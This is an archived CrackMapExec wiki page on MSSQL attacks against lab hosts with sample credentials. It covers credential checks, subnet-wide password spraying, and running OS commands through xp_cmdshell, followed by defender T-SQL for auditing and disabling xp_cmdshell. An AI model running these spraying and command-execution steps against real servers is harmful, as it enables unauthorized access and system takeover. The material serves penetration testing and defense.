This repository has been archived by the owner on Dec 6, 2023. It is now read-only.

MSSQL Command Reference

mpgn edited this page Apr 30, 2020 · 4 revisions

MSSQL: Command Reference

Updated: 04/28/20
CME Version: 5.0.1dev


Testing credentials

You can use two methods to authenticate to MSSQL: windows or normal (default: windows). To use local (SQL) auth, add the flag -a normal.

1. Windows auth

  1. With SMB port open
#~ cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
  2. With SMB port closed, add the flag -d DOMAIN
#~ cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d HTB

Expected Results:

MSSQL       10.10.10.52     1433   MANTIS           [+] HTB\james:J@m3s_P@ssW0rd! 

2. Local auth

#~ cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' -a normal

Expected Results:

MSSQL       10.10.10.52     1433   None             [+] admin:m$$ql_S@_P@ssW0rd! (Pwn3d!)

Specify Ports

#~ cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' -a normal --port 1434

Password spraying (without bruteforce)

#~ cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Expected Results:

MSSQL       10.10.10.59     1433   None             [-] ERROR(TALLY): Line 1: Login failed for user 'test1'.
MSSQL       10.10.10.59     1433   None             [+] sa:password (Pwn3d!)

Note: By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Useful for spraying a single password against a large user list.


Execute MSSQL command

cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' -a normal -q 'SELECT name FROM master.dbo.sysdatabases;'

Expected Results:

MSSQL       10.10.10.52     1433   None             [+] admin:m$$ql_S@_P@ssW0rd! (Pwn3d!)
MSSQL       10.10.10.52     1433   None             name
MSSQL       10.10.10.52     1433   None             --------------------------------------------------------------------------------------------------------------------------------
MSSQL       10.10.10.52     1433   None             master
MSSQL       10.10.10.52     1433   None             tempdb
MSSQL       10.10.10.52     1433   None             model
MSSQL       10.10.10.52     1433   None             msdb
MSSQL       10.10.10.52     1433   None             orcharddb

Execute Windows Command

This option uses xp_cmdshell to execute the command on the remote host.

#~ cme mssql 10.10.10.59 -u sa -p 'GWE3V65#6KFH93@4GWTG2G' -a normal -x whoami
MSSQL       10.10.10.59     1433   None             [+] sa:GWE3V65#6KFH93@4GWTG2G (Pwn3d!)
MSSQL       10.10.10.59     1433   None             [+] Executed command via mssqlexec
MSSQL       10.10.10.59     1433   None             --------------------------------------------------------------------------------
MSSQL       10.10.10.59     1433   None             tally\sarah

If the EXECUTE permission on xp_cmdshell is denied:

MSSQL       10.10.10.52     1433   None             [+] admin:m$$ql_S@_P@ssW0rd! (Pwn3d!)
MSSQL       10.10.10.52     1433   None             [-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
MSSQL       10.10.10.52     1433   None             [+] Executed command via mssqlexec
MSSQL       10.10.10.52     1433   None             None
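The two outcomes above depend on the instance's xp_cmdshell configuration. The following T-SQL is an added defender-side check, not part of the CME wiki; it assumes you run it as a sysadmin on the SQL Server instance being reviewed.

```sql
-- Added example (not from the CME wiki): audit the xp_cmdshell exposure that
-- the "-x" option relies on. Assumes sysadmin rights on the instance.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means any login holding EXECUTE
--    on it can run OS commands (the "tally\sarah" result above).
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';

-- 2. Which principals have been granted EXECUTE on xp_cmdshell? The object
--    lives in master, so that database's permission catalog is the one to read.
--    sysadmin members do not need a grant and will not appear here.
USE master;
SELECT pr.name AS grantee, pr.type_desc, dp.permission_name, dp.state_desc
FROM sys.database_permissions AS dp
JOIN sys.database_principals AS pr
  ON pr.principal_id = dp.grantee_principal_id
WHERE dp.class = 1                                   -- object-level permission
  AND dp.major_id = OBJECT_ID(N'sys.xp_cmdshell')
  AND dp.permission_name = N'EXECUTE';

-- 3. Is a proxy account configured? Non-sysadmin callers run xp_cmdshell under
--    this credential; if it is absent they fail even when EXECUTE was granted.
SELECT name, credential_identity, create_date
FROM sys.credentials
WHERE name = N'##xp_cmdshell_proxy_account##';

-- 4. Remediation when xp_cmdshell is enabled but not required: disable it.
--    'show advanced options' must be on before the xp_cmdshell option is visible.
EXEC sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure N'xp_cmdshell', 0;
RECONFIGURE;
```

Failed attempts from the password-spraying section surface as "Login failed for user" (error 18456) in the SQL Server error log and the Windows Application log, so a burst of those against one instance is the corresponding detection signal.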